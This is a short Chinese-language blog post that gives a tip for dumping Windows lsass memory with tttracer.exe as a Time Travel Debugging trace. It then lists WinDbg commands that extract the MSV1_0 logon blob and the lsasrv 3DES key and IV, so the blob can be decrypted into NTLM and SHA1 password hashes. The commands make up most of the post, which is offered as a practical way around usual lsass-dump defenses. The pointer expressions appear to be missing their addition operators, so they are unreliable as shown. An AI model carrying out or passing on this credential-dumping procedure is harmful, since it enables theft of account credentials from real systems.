Lsass dump is dead, long live Lsass Time Travel!

2022-11-02 17:05:24 浏览数 (3)

分享一个小tips,利用tttracer.exe进行lsass转储,转储成Time Travel Debugging格式,思路来源:https://twitter.com/n_o_t_h_a_n_k_s/status/1559620227586875392

首先新建两个管理员权限的powershell终端,分别运行:

代码语言:javascript复制
tttracer -dumpfull -attach (Get-Process lsass | Select -expand id)

tttracer -stop (Get-Process lsass | Select -expand id)

然后将得到的.run文件放入WinDbg Preview.

懒得本地再装WinDbg Preview.了直接用作者的图

然后运行下面的指令得到MSV1_0 blob区域

代码语言:javascript复制
db poi(poi(poi(poi(lsasrv!LogonSessionList)) 0x108) 0x10) 0x28 0x8 L0x1b0

然后运行下面的指令拿到3des的key和iv

代码语言:javascript复制
db lsasrv!InitializationVector L8

db poi(poi(lsasrv!h3DesKey) 0x10) 0x38 4 L0x18

最后就是用key和iv去解密blob拿到ntlm、sha1

注意该方法dump的文件mimikatz无法解密,不同版本偏移不同所以windbg命令也不相同

0 人点赞